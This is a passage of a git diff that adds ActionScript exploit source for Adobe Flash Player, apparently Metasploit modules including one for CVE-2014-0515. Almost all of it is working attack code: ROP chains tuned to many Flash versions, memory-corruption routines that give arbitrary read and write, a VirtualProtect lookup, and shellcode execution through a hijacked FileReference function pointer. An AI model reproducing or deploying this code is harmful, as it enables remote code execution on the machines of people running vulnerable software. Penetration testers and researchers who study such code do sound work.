+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4794076));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1939822));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 5126435));
+					payload.writeUnsignedInt((vftableAddr_copy + 6702008));
+					payload.writeUnsignedInt((vftableAddr_copy + 2353542));
+					payload.writeUnsignedInt((vftableAddr_copy + 3516455));
+					payload.writeUnsignedInt((vftableAddr_copy + 2768305));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,2,202,228":
+					vftableAddr_copy = (vftableAddr_copy - 7726032);
+					_local_5 = (vftableAddr_copy + 0x93F000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4947482));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2022234));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 6255948));
+					payload.writeUnsignedInt((vftableAddr_copy + 6824832));
+					payload.writeUnsignedInt((vftableAddr_copy + 5021261));
+					payload.writeUnsignedInt((vftableAddr_copy + 6176368));
+					payload.writeUnsignedInt((vftableAddr_copy + 2847152));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,2,202,233":
+					vftableAddr_copy = (vftableAddr_copy - 7729872);
+					_local_5 = (vftableAddr_copy + 0x93F000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4947594));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2022508));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 4691374));
+					payload.writeUnsignedInt((vftableAddr_copy + 6824832));
+					payload.writeUnsignedInt((vftableAddr_copy + 4164715));
+					payload.writeUnsignedInt((vftableAddr_copy + 5837496));
+					payload.writeUnsignedInt((vftableAddr_copy + 2847021));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,2,202,235":
+					vftableAddr_copy = (vftableAddr_copy - 7734032);
+					_local_5 = (vftableAddr_copy + 0x940000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4947578));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2022729));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 5249755));
+					payload.writeUnsignedInt((vftableAddr_copy + 6828928));
+					payload.writeUnsignedInt((vftableAddr_copy + 4261382));
+					payload.writeUnsignedInt((vftableAddr_copy + 4553024));
+					payload.writeUnsignedInt((vftableAddr_copy + 2847456));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,300,257":
+					vftableAddr_copy = (vftableAddr_copy - 8232016);
+					_local_5 = (vftableAddr_copy + 0x9C3000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 5328586));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2069614));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 6497300));
+					payload.writeUnsignedInt((vftableAddr_copy + 7222148));
+					payload.writeUnsignedInt((vftableAddr_copy + 5022322));
+					payload.writeUnsignedInt((vftableAddr_copy + 4972967));
+					payload.writeUnsignedInt((vftableAddr_copy + 3071572));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,300,273":
+					vftableAddr_copy = (vftableAddr_copy - 8236216);
+					_local_5 = (vftableAddr_copy + 0x9C4000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 5331930));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2070667));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 6500737));
+					payload.writeUnsignedInt((vftableAddr_copy + 7226252));
+					payload.writeUnsignedInt((vftableAddr_copy + 5142060));
+					payload.writeUnsignedInt((vftableAddr_copy + 5127634));
+					payload.writeUnsignedInt((vftableAddr_copy + 3074828));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,4,402,278":
+					vftableAddr_copy = (vftableAddr_copy - 8503560);
+					_local_5 = (vftableAddr_copy + 0xA23000);
+					payload.writeUnsignedInt((vftableAddr_copy + 5581452));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1202409));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 6927402));
+					payload.writeUnsignedInt((vftableAddr_copy + 7480208));
+					payload.writeUnsignedInt((vftableAddr_copy + 5373116));
+					payload.writeUnsignedInt((vftableAddr_copy + 5713520));
+					payload.writeUnsignedInt((vftableAddr_copy + 3269652));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,4,402,287":
+					vftableAddr_copy = (vftableAddr_copy - 8507728);
+					_local_5 = (vftableAddr_copy + 0xA24000);
+					payload.writeUnsignedInt((vftableAddr_copy + 5582348));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1202841));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 6927143));
+					payload.writeUnsignedInt((vftableAddr_copy + 7484304));
+					payload.writeUnsignedInt((vftableAddr_copy + 5481024));
+					payload.writeUnsignedInt((vftableAddr_copy + 5107604));
+					payload.writeUnsignedInt((vftableAddr_copy + 5747979));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,110":
+					vftableAddr_copy = (vftableAddr_copy - 11716376);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.position = 20;
+					payload.writeUnsignedInt((vftableAddr_copy + 9813154));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 448623));
+					payload.position = 96;
+					payload.writeUnsignedInt((vftableAddr_copy + 9326463));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 5731300));
+					payload.writeUnsignedInt((vftableAddr_copy + 8910259));
+					payload.writeUnsignedInt((vftableAddr_copy + 8630687));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,135":
+					vftableAddr_copy = (vftableAddr_copy - 11716400);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.writeUnsignedInt((vftableAddr_copy + 1101327));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4733912));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 4540));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 28862));
+					payload.writeUnsignedInt((vftableAddr_copy + 512197));
+					payload.writeUnsignedInt((vftableAddr_copy + 1560889));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,146":
+					vftableAddr_copy = (vftableAddr_copy - 11716320);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.writeUnsignedInt((vftableAddr_copy + 1101327));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4733912));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 4540));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 28862));
+					payload.writeUnsignedInt((vftableAddr_copy + 512197));
+					payload.writeUnsignedInt((vftableAddr_copy + 1560889));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,149":
+					vftableAddr_copy = (vftableAddr_copy - 11712240);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 10373824));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4331881));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9292830));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 5731956));
+					payload.writeUnsignedInt((vftableAddr_copy + 7150772));
+					payload.writeUnsignedInt((vftableAddr_copy + 3344264));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,168":
+					vftableAddr_copy = (vftableAddr_copy - 11825816);
+					_local_5 = (vftableAddr_copy + 0xEE9000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 9924439));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4370139));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9564155));
+					payload.writeUnsignedInt((vftableAddr_copy + 10736920));
+					payload.writeUnsignedInt((vftableAddr_copy + 5830863));
+					payload.writeUnsignedInt((vftableAddr_copy + 9044861));
+					payload.writeUnsignedInt((vftableAddr_copy + 7984191));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,171":
+					vftableAddr_copy = (vftableAddr_copy - 11834040);
+					_local_5 = (vftableAddr_copy + 0xEEA000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 9925589));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4370636));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9564442));
+					payload.writeUnsignedInt((vftableAddr_copy + 10741016));
+					payload.writeUnsignedInt((vftableAddr_copy + 5771380));
+					payload.writeUnsignedInt((vftableAddr_copy + 10153408));
+					payload.writeUnsignedInt((vftableAddr_copy + 7983199));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,180":
+					vftableAddr_copy = (vftableAddr_copy - 11824712);
+					_local_5 = (vftableAddr_copy + 0xEE9000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 9923173));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4368414));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9562061));
+					payload.writeUnsignedInt((vftableAddr_copy + 10736920));
+					payload.writeUnsignedInt((vftableAddr_copy + 5828990));
+					payload.writeUnsignedInt((vftableAddr_copy + 9042989));
+					payload.writeUnsignedInt((vftableAddr_copy + 8661666));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,169":
+					vftableAddr_copy = (vftableAddr_copy - 12902952);
+					_local_5 = (vftableAddr_copy + 16904192);
+					payload.writeUnsignedInt((vftableAddr_copy + 1116239));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 10368763));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 2586086));
+					payload.writeUnsignedInt((vftableAddr_copy + 11752328));
+					payload.writeUnsignedInt((vftableAddr_copy + 32732));
+					payload.writeUnsignedInt((vftableAddr_copy + 8192266));
+					payload.writeUnsignedInt((vftableAddr_copy + 1578904));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,202":
+					vftableAddr_copy = (vftableAddr_copy - 0xc4f508);
+					_local_5 = (vftableAddr_copy + 0x101f000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 0x7dfcd2)); // 107dfcd2 : add esp,44h ; ret
+					payload.position = 0x40;
+					payload.writeUnsignedInt((vftableAddr_copy + 0x12a269)); // 1012a269 : xchg edx,esp ; add  eax,dword ptr [eax]; add  byte ptr [edi+5Eh],bl ; pop ecx ; ret 
+					payload.position = 0x50;
+					payload.writeUnsignedInt((vftableAddr_copy + 0xcb497));  // 100cb497 : pop eax ; ret
+					payload.writeUnsignedInt((vftableAddr_copy + 0xb35388)); // 10b35388 : ptr to VirtualProtect 
+					payload.writeUnsignedInt((vftableAddr_copy + 0x110d3d)); // 10110d3d : mov eax,dword ptr [eax] ; ret
+					payload.writeUnsignedInt((vftableAddr_copy + 0x887362)); // 10887362 : push eax ; ret
+					payload.writeUnsignedInt((vftableAddr_copy + 0x331bff)); // 10331bff : jmp esp
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(0x40);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,8,800,97":
+					vftableAddr_copy = (vftableAddr_copy - 129165844);
+					_local_5 = (vftableAddr_copy + 16904192);
+					payload.position = 8;
+					payload.writeUnsignedInt(vftableAddr_copy);
+					payload.position = 16;
+					payload.writeUnsignedInt((vftableAddr_copy + 117625919));
+					payload.writeUnsignedInt(-1810746282);
+					payload.writeUnsignedInt((scAddr + 76));
+					payload.writeUnsignedInt((vftableAddr_copy + 122565891));
+					payload.position = 44;
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 0x0400));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 123362382));
+					payload.position = 80;
+					payload.writeUnsignedInt((scAddr + 192));
+					payload.position = 112;
+					payload.writeUnsignedInt((vftableAddr_copy + 32365));
+					payload.writeUnsignedInt((vftableAddr_copy + 11760520));
+					payload.writeUnsignedInt((vftableAddr_copy + 1117213));
+					payload.writeUnsignedInt((vftableAddr_copy + 3721232));
+					payload.writeUnsignedInt((vftableAddr_copy + 8274178));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,8,800,50":
+					vftableAddr_copy = (vftableAddr_copy - 12936000);
+					_local_5 = (vftableAddr_copy + 17149952);
+					payload.writeUnsignedInt((vftableAddr_copy + 404531));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2583617));
+					payload.position = 72;
+					payload.writeUnsignedInt((vftableAddr_copy + 7914140));
+					payload.writeUnsignedInt((vftableAddr_copy + 4550));
+					payload.writeUnsignedInt((vftableAddr_copy + 11780992));
+					payload.writeUnsignedInt((vftableAddr_copy + 32684));
+					payload.writeUnsignedInt((vftableAddr_copy + 142358));
+					payload.writeUnsignedInt((vftableAddr_copy + 1577816));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				default:
+					return (null);
+			};
+			return (payload);
+		}
+		
+		public function exploit():Boolean
+		{
+			var vector_objects_entry_length:int;
+			var shellcode_byte = null;
+			var _local_6:uint;
+			var i:int;
+			var vftable_addr:uint;
+			var shellcode_address:uint;
+			var vector_objects_entry_idx:uint;
+			var length_vector_byte_arrays:uint;
+			var vector_byte_arrays:Vector.<ByteArray> = new Vector.<ByteArray>(0);
+			var vector_objects:Vector.<Object> = new Vector.<Object>(0);
+			var twos_object:Object = new <Object>[2, 2, 2, 2, 2, 2, 2, 2];
+			var vickers_byte_array:ByteArray = new ByteArray();
+			while (i < 0x0500)
+			{
+				vector_byte_arrays[i] = new ByteArray();
+				vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
+				i++;
+			};
+			vickers_byte_array.writeUTFBytes("vickers");
+			vickers_byte_array.length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
+			ApplicationDomain.currentDomain.domainMemory = vickers_byte_array;
+			vector_byte_arrays[i] = new ByteArray();
+			vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
+			length_vector_byte_arrays = i;
+			i = 0;
+			while (i < (vector_byte_arrays.length - 1))
+			{
+				vector_byte_arrays[i++] = null;
+			};
+			i = 0;
+			while (i < 0x8000)
+			{
+				vector_objects[i] = new <Object>[i, twos_object, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1];
+				i++;
+			};
+			// _local_6 => nil => 0, makes li32(_local_6 - offset) makes it underflow!
+			// Example leak:  0275ef00 => 10c4f508 0000003b 00002326
+			if (((!((li16((_local_6 + 1)) == 114))) && (((vftable_addr = li32((_local_6 - 0x0100)) ) == 305419896))))
+			{
+			};
+			if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_idx = li32((_local_6 - 248)) ) == 305419896))))
+			{
+			};
+			vector_objects_entry_idx = (vector_objects_entry_idx >> 3);
+			if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_length = li32((_local_6 - 252)) ) == 305419896))))
+			{
+			};
+			
+			// No success
+			if (vector_objects_entry_length != vector_objects[vector_objects_entry_idx].length)
+			{
+				vickers_byte_array = null;
+				vector_byte_arrays[length_vector_byte_arrays] = null;
+				i = 0;
+				while (i < vector_objects.length)
+				{
+					vector_objects[i++] = null;
+				};
+				return (false);
+			};
+			
+			i = 0;
+			while (i < vector_objects.length)
+			{
+				if (i != vector_objects_entry_idx)
+				{
+					vector_objects[i] = null;
+				};
+				i++;
+			};
+			// Use underflow to leak shellcode address
+			if (((!((li16((_local_6 + 1)) == 114))) && (((shellcode_address = li32((_local_6 - 0x0200)) ) == 305419896))))
+			{
+			};
+			shellcode_address = (shellcode_address + 0x1300);
+			var rop_payload:ByteArray = makePayload(vftable_addr, shellcode_address);
+			if (rop_payload == null)
+			{
+				return (true);
+			};
+			var j:uint;
+			var shellcode_length:uint = shellcode.length;
+			var shellcode_byte_array:ByteArray = new ByteArray();
+			shellcode_byte_array.endian = "littleEndian";
+			while (j < shellcode_length)
+			{
+				shellcode_byte = (shellcode.charAt(j) + shellcode.charAt((j + 1)));
+				shellcode_byte_array.writeByte(parseInt(shellcode_byte, 16));
+				j = (j + 2);
+			};
+			vector_byte_arrays[length_vector_byte_arrays].position = 0;
+			vector_byte_arrays[length_vector_byte_arrays].endian = "littleEndian";
+			vector_byte_arrays[length_vector_byte_arrays].writeBytes(rop_payload);
+			vector_byte_arrays[length_vector_byte_arrays].writeBytes(shellcode_byte_array);
+			// Use underflow to overwrite and get code execution
+			if (li16((_local_6 + 1)) != 114)
+			{
+				si32((shellcode_address + 1), (_local_6 - 244));
+			};
+			vector_objects[vector_objects_entry_idx][1][0];
+			return (true);
+		}
+		
+		
+	}
+}//package 
diff --git a/external/source/exploits/CVE-2014-0515/Graph.as b/external/source/exploits/CVE-2014-0515/Graph.as
new file mode 100755
index 0000000000..ab64eb90cd
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Graph.as
@@ -0,0 +1,411 @@
+//compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf
+package {
+	import flash.display.Sprite;
+	import flash.utils.ByteArray;
+	import flash.display.Shader;
+	import flash.system.Capabilities;
+	import flash.net.FileReference;
+	import flash.utils.Endian;
+	import __AS3__.vec.Vector;
+	import __AS3__.vec.*;
+	import flash.display.LoaderInfo;
+	
+	public class Graph extends Sprite {
+		
+		static var counter:uint = 0;
+		
+		protected var Shad:Class;
+		var shellcode_byte_array:ByteArray;
+		var aaab:ByteArray;
+		var shellcodeObj:Array;
+		
+		public function Graph(){
+			var tweaked_vector:* = undefined;
+			var tweaked_vector_address:* = undefined;
+			var shader:Shader;
+			var flash_memory_protect:Array;
+			var code_vectors:Array;
+			var address_code_vector:uint;
+			var address_shellcode_byte_array:uint;
+			this.Shad = Graph_Shad;
+			super();
+			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");
+			var i:* = 0;
+			var j:* = 0;
+			
+			// Just one try
+			counter++;
+			if (counter > 1)
+			{
+				return;
+			};
+			
+			// Memory massage
+			var array_length:uint = 0x10000;
+			var vector_size:uint = 34;
+			var array:Array = new Array();
+			i = 0;
+			while (i < array_length)
+			{
+				array[i] = new Vector.<int>(1);
+				i++;
+			};
+			i = 0;
+			while (i < array_length)
+			{
+				array[i] = new Vector.<int>(vector_size);
+				i++;
+			};
+			i = 0;
+			while (i < array_length)
+			{
+				array[i].length = 0;
+				i++;
+			};
+			i = 0x0200;
+			while (i < array_length)
+			{
+				array[(i - (2 * (j % 2)))].length = 0x0100;
+				i = (i + 28);
+				j++;
+			};
+			
+			// Overflow and Search for corrupted vector
+			var corrupted_vector_idx:uint;
+			var shadba:ByteArray = (new this.Shad() as ByteArray);
+			shadba.position = 232;
+			if (Capabilities.os.indexOf("Windows 8") >= 0)
+			{
+				shadba.writeUnsignedInt(2472);
+			};
+			shadba.position = 0;
+			while (1)
+			{
+				shader = new Shader();
+				try
+				{
+					shader.byteCode = (new this.Shad() as ByteArray);
+				} catch(e)
+				{
+				};
+				i = 0;
+				while (i < array_length)
+				{
+					if (array[i].length > 0x0100)
+					{
+						corrupted_vector_idx = i;
+						break;
+					};
+					i++;
+				};
+				if (i != array_length)
+				{
+					if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break;
+				};
+				array.push(new Vector.<int>(vector_size));
+			};
+			
+			// Tweak the vector following the corrupted one
+			array[corrupted_vector_idx][vector_size] = 0x40000001;
+			tweaked_vector = array[(corrupted_vector_idx + 1)];
+			
+			// repair the corrupted vector by restoring its
+			// vector object pointer and length
+			var vector_obj_addr:* = tweaked_vector[0x3fffffff];
+			tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr;
+			tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size;
+			i = 0;
+			var val:uint;
+			while (true)
+			{
+				val = tweaked_vector[(0x40000000 - i)];
+				if (val == 0x90001B) break;
+				i++;
+			};
+			tweaked_vector_address = 0;
+			if (tweaked_vector[((0x40000000 - i) - 4)] > 0)
+			{
+				tweaked_vector[4] = 0x41414141;
+				tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8);				
+			};
+			
+			// More memory massage, fill an array of FileReference objects
+			var file_reference_array:Array = new Array();
+			i = 0;
+			while (i < 64)
+			{
+				file_reference_array[i] = new FileReference();
+				i++;
+			};
+			
+			var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address);
+			var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20));
+			var do_it:Boolean = true;
+			var memory_protect_ptr:uint;
+			var aaaq:uint;
+			if (do_it)
+			{
+				flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address);
+				memory_protect_ptr = flash_memory_protect[0];
+				aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment
+				code_vectors = this.createCodeVectors(0x45454545, 0x90909090);
+				address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545);
+				this.fillCodeVectors(code_vectors);
+				tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call
+				tweaked_vector[4] = aaaq; 				
+				tweaked_vector[0] = 0x1000; // Length
+				tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address
+				
+				// 10255e21 ff5014          call    dword ptr [eax+14h]  ds:0023:41414155=????????
+				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8));
+				
+				// 1) Set memory as executable
+				i = 0;
+				while (i < 64)
+				{
+					file_reference_array[i].cancel();
+					i++;
+				};
+				
+				// 2) Execute shellcode 
+				tweaked_vector[7] = address_code_vector;
+				i = 0;
+				while (i < 64)
+				{
+					file_reference_array[i].cancel();
+					i++;
+				};
+				
+				// Restore FileReference cancel function pointer
+				// Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads
+				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address);
+			};
+		}
+		
+		// returns the integer at memory address
+		// vector: vector with tweaked length
+		// vector_address: vector's memory address
+		// address: memory address to read
+		function read_memory(vector:Vector.<int>, vector_address:uint, address:uint):uint{
+			if (address >= vector_address)
+			{
+				return (vector[((address - vector_address) / 4)]);
+			};
+			return (vector[(0x40000000 - ((vector_address - address) / 4))]);
+		}
+		
+		function write_memory(vector:Vector.<int>, vector_address:uint, address:uint, value:uint){
+			if (address >= vector_address)
+			{
+				vector[((address - vector_address) / 4)] = value;
+			} else
+			{
+				vector[(0x40000000 - ((vector_address - address) / 4))] = value;
+			};
+		}
+		
+		function findFlashMemoryProtect(vector:*, vector_address:*):Array{
+			var content:uint;
+			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
+			var index:uint;
+			var memory_protect_ptr:uint;
+			var _local_6:uint;
+			if (allocation >= vector_address)
+			{
+				index = ((allocation - vector_address) / 4);
+			} else
+			{
+				index = (0x40000000 - ((vector_address - allocation) / 4));
+			};
+			
+			//push    1 ; 6a 01
+			//push    dword ptr [eax-8] ; ff 70 f8
+			//push    dword ptr [eax-4] ; ff 70 fc
+			//call    sub_1059DD00 // Will do VirtualProtect
+			var offset:uint;
+			while (1)
+			{
+				index--;
+				content = vector[index];
+				if (content == 0xfff870ff)
+				{
+					offset = 2;
+					break;
+				};
+				if (content == 0xf870ff01)
+				{
+					offset = 1;
+					break;
+				};
+				if (content == 0x70ff016a)
+				{
+					content = vector[(index + 1)];
+					if (content == 0xfc70fff8)
+					{
+						offset = 0;
+						break;
+					};
+				} else
+				{
+					if (content == 0x70fff870)
+					{
+						offset = 3;
+						break;
+					};
+				};
+			};
+			
+			memory_protect_ptr = ((vector_address + (4 * index)) - offset);
+			index--;
+			var content_before:uint = vector[index];
+			
+			if (content_before == 0x16a0424)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			if (content_before == 0x6a042444)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			if (content_before == 0x424448b)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			if (content_before == 0xff016a04)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			_local_6 = (memory_protect_ptr - 6);
+			
+			while (1)
+			{
+				index--;
+				content = vector[index];
+				if (content == 0x850ff50)
+				{
+					if (uint(vector[(index + 1)]) == 0x5e0cc483)
+					{
+						offset = 0;
+						break;
+					};
+				};
+				content = (content & 0xFFFFFF00);
+				if (content == 0x50FF5000)
+				{
+					if (uint(vector[(index + 1)]) == 0xcc48308)
+					{
+						offset = 1;
+						break;
+					};
+				};
+				content = (content & 0xFFFF0000);
+				if (content == 0xFF500000)
+				{
+					if (uint(vector[(index + 1)]) == 0xc4830850)
+					{
+						if (uint(vector[(index + 2)]) == 0xc35d5e0c)
+						{
+							offset = 2;
+							break;
+						};
+					};
+				};
+				content = (content & 0xFF000000);
+				if (content == 0x50000000)
+				{
+					if (uint(vector[(index + 1)]) == 0x830850ff)
+					{
+						if (uint(vector[(index + 2)]) == 0x5d5e0cc4)
+						{
+							offset = 3;
+							break;
+						};
+					};
+				};
+			};
+			memory_protect_ptr = ((vector_address + (4 * index)) + offset);
+			return ([memory_protect_ptr, _local_6]);
+		}
+		
+		// vector: vector with tweaked length
+		// address: memory address of vector data
+		function find_file_ref_vtable(vector:*, address:*):uint{
+			var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c));
+			
+			// Find an allocation of size 0x2a0
+			var allocation_size:uint;
+			while (true)
+			{
+				allocation_size = this.read_memory(vector, address, (allocation + 8));
+				if (allocation_size == 0x2a0) break;
+				if (allocation_size < 0x2a0)
+				{
+					allocation = (allocation + 0x24); // next allocation
+				} else
+				{
+					allocation = (allocation - 0x24); // prior allocation
+				};
+			};
+			var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc));
+			while (true)
+			{
+				if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break;
+				if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break;
+				allocation_contents = this.read_memory(vector, address, (allocation_contents + 8));
